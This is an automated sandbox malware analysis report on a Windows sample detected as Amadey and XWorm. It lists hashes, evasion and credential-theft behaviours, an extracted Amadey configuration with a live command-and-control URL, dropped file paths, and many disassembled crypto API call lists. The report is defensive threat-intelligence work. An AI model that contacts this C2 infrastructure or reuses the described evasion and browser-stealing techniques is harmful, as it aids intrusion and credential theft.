Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1560508
MD5: 6aed281d1464e3a53839bbd9e7190535
SHA1: 8ea6e9ec2eb3970e0c361538fb6dbd074e5fa6c2
SHA256: a20abe49e71912d860044fdf813c7fb90f32fde51097db4b689cac9c8f7a9ac9
Tags: exeuser-Bitsight
Infos:

Detection

Amadey, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Telegram RAT
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found pyInstaller with non standard icon
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a global mouse hook
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Execution of Suspicious File Type Extension
Spawns drivers
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Name Description Attribution Blogpost URLs Link
XWorm Malware with wide range of capabilities ranging from RAT to ransomware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: file.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.43/Zu7JuNko/index.php8 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpd-b6bf-11d0-94f2-00a0c9 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php$ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\samat[1].exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 47%
Multi AV Scanner detection for submitted file
Source: file.exe ReversingLabs: Detection: 47%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9710 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,_Py_NoneStruct,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,PyEval_SaveThread,CryptUnprotectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,PyBytes_FromStringAndSize,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,Py_BuildValue,LocalFree,LocalFree,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EB9710
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB50E0 CryptReleaseContext, 8_2_00007FF8B7EB50E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB48D8 PyArg_ParseTupleAndKeywords,CryptDuplicateKey,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB48D8
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5CD0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptImportKey,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB5CD0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB50D0 CryptReleaseContext, 8_2_00007FF8B7EB50D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBA0D0 PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptGetDefaultProviderW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,free, 8_2_00007FF8B7EBA0D0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB94B0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,_Py_NoneStruct,PyExc_TypeError,PyErr_SetString,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,??1PyWinBufferView@@QEAA@XZ,??1PyWinBufferView@@QEAA@XZ,_Py_NoneStruct,PyEval_SaveThread,CryptProtectData,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,LocalFree,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,PyMem_Free, 8_2_00007FF8B7EB94B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4490 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey, 8_2_00007FF8B7EB4490
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBE870 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyLong_AsVoidPtr,PyErr_Occurred,PyErr_Clear,PyBytes_AsString,PyExc_ValueError,PyErr_Format,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,_Py_NoneStruct,PyExc_ValueError,PyErr_SetString,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptFormatObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBE870
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3C60 PyArg_ParseTupleAndKeywords,CryptDuplicateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB3C60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBC860 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptSignAndEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,CertFreeCertificateContext,free,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBC860
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4050 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptVerifySignatureW,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB4050
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4430 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey, 8_2_00007FF8B7EB4430
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9C30 PyList_New,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProvidersW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyErr_Format, 8_2_00007FF8B7EB9C30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3C10 CryptDestroyHash,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB3C10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD010 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptGetMessageSignerCount,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyLong_FromLong,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBD010
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5000 CryptMsgClose,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct, 8_2_00007FF8B7EB5000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBF000 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,PyEval_SaveThread,CryptStringToBinaryW,PyEval_RestoreThread,_Py_Dealloc,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,Py_BuildValue,PyMem_Free, 8_2_00007FF8B7EBF000
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB43E0 _Py_Dealloc,_Py_Dealloc,CryptDestroyKey, 8_2_00007FF8B7EB43E0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBAFD0 PyArg_ParseTupleAndKeywords,PyExc_ValueError,PyErr_SetString,PyExc_TypeError,PyErr_SetString,PyArg_ParseTuple,PyLong_AsLong,PyErr_Occurred,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyBytes_AsString,PyEval_SaveThread,CryptFindOIDInfo,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EBAFD0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4BC0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,malloc,PyErr_NoMemory,memcpy,CryptDecrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB4BC0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBC3B0 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,PyEval_SaveThread,CryptEncryptMessage,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,CertFreeCertificateContext,free,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBC3B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBD3B0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyDetachedMessageSignature,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,free,free,??1PyWinBufferView@@QEAA@XZ,free, 8_2_00007FF8B7EBD3B0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3BA0 CryptDestroyHash, 8_2_00007FF8B7EB3BA0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5B90 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptCreateHash,_Py_NewReference,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB5B90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5F80 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,PyArg_ParseTupleAndKeywords,CryptImportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB5F80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBCB80 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptVerifyMessageSignature,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,CertFreeCertificateContext,??1PyWinBufferView@@QEAA@XZ,free, 8_2_00007FF8B7EBCB80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3B70 CryptDestroyHash, 8_2_00007FF8B7EB3B70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3B60 CryptDestroyHash, 8_2_00007FF8B7EB3B60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4F60 CryptMsgClose,_Py_Dealloc, 8_2_00007FF8B7EB4F60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5350 PyArg_ParseTupleAndKeywords,CryptGetProvParam,malloc,PyExc_MemoryError,PyErr_Format,CryptGetProvParam,PyExc_NotImplementedError,PyErr_SetString,free,CryptGetProvParam,PyBool_FromLong,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,Py_BuildValue,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,CryptGetProvParam,GetLastError,malloc,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,PyList_New,CryptGetProvParam,?PyWinCoreString_FromString@@YAPEAU_object@@PEBD_J@Z,Py_BuildValue,PyList_Append,_Py_Dealloc,CryptGetProvParam,_Py_Dealloc,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB5350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBA350 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptFindLocalizedName,PyEval_RestoreThread,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EBA350
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4740 PyArg_ParseTupleAndKeywords,CryptGetKeyParam,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptGetKeyParam,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyExc_NotImplementedError,PyErr_SetString,free, 8_2_00007FF8B7EB4740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBB740 PyArg_ParseTupleAndKeywords,PyList_New,PyEval_SaveThread,CryptEnumOIDInfo,PyEval_RestoreThread,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EBB740
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4F10 CryptMsgClose,_Py_Dealloc, 8_2_00007FF8B7EB4F10
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3F00 PyArg_ParseTupleAndKeywords,CryptSignHashW,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptSignHashW,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free, 8_2_00007FF8B7EB3F00
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB4ED0 CryptMsgClose,_Py_Dealloc, 8_2_00007FF8B7EB4ED0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9A90 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptAcquireContextW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EB9A90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBCE90 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyExc_TypeError,PyErr_SetString,PyEval_SaveThread,CryptGetMessageCertificates,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NewReference,PyLong_FromVoidPtr,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBCE90
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5270 PyArg_ParseTupleAndKeywords,CryptGenKey,GetLastError,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB5270
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBBA70 PyArg_ParseTupleAndKeywords,PyExc_ValueError,PyErr_Format,?init@PyWinBufferView@@QEAA_NPEAU_object@@_N1@Z,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptQueryObject,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyLong_FromVoidPtr,Py_BuildValue,??1PyWinBufferView@@QEAA@XZ,PyMem_Free, 8_2_00007FF8B7EBBA70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB9E70 PyList_New,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,malloc,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,_Py_NoneStruct,Py_BuildValue,PyList_Append,_Py_Dealloc,free,PyEval_SaveThread,CryptEnumProviderTypesW,PyEval_RestoreThread,GetLastError,_Py_Dealloc,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_Dealloc,free,GetLastError,free,PyExc_MemoryError,PyErr_Format, 8_2_00007FF8B7EB9E70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBEE70 PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptBinaryToStringW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FromOLECHAR@@YAPEAU_object@@PEB_W_J@Z,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EBEE70
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5A60 PyArg_ParseTupleAndKeywords,malloc,PyExc_MemoryError,PyErr_Format,memset,memcpy,CryptGenRandom,PyBytes_FromStringAndSize,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free, 8_2_00007FF8B7EB5A60
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB5E40 PyArg_ParseTupleAndKeywords,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyExc_MemoryError,PyErr_Format,CryptExportPublicKeyInfo,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free, 8_2_00007FF8B7EB5E40
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB3E30 PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,CryptHashSessionKey,_Py_NoneStruct,_Py_NoneStruct,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z, 8_2_00007FF8B7EB3E30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB2E30 PyExc_ValueError,PyErr_SetString,PyArg_ParseTupleAndKeywords,PyEval_SaveThread,CryptAcquireCertificatePrivateKey,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,CryptContextAddRef,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,_Py_NewReference,Py_BuildValue, 8_2_00007FF8B7EB2E30
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBA230 PyArg_ParseTupleAndKeywords,?PyWinObject_AsWCHAR@@YAHPEAU_object@@PEAPEA_WHPEAK@Z,PyEval_SaveThread,CryptSetProviderExW,PyEval_RestoreThread,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z,_Py_NoneStruct,_Py_NoneStruct,?PyWinObject_FreeWCHAR@@YAXPEA_W@Z, 8_2_00007FF8B7EBA230
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBBE2C _Py_NoneStruct,PyArg_ParseTupleAndKeywords,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,??1PyWinBufferView@@QEAA@XZ,free,CertCloseStore,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,Py_BuildValue,malloc,PyErr_NoMemory,PyEval_SaveThread,CryptDecodeMessage,PyEval_RestoreThread,PyErr_Occurred,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,free,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,_Py_NoneStruct,_Py_NoneStruct,_Py_NewReference,PyBytes_FromStringAndSize,Py_BuildValue,free,CertFreeCertificateContext,CertFreeCertificateContext, 8_2_00007FF8B7EBBE2C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EB49F0 _Py_NoneStruct,PyArg_ParseTupleAndKeywords,PyExc_TypeError,PyErr_SetString,??0PyWinBufferView@@QEAA@PEAU_object@@_N1@Z,CryptEncrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,malloc,PyErr_NoMemory,CryptEncrypt,?PyWin_SetAPIError@@YAPEAU_object@@PEADJ@Z,PyBytes_FromStringAndSize,free,??1PyWinBufferView@@QEAA@XZ, 8_2_00007FF8B7EB49F0
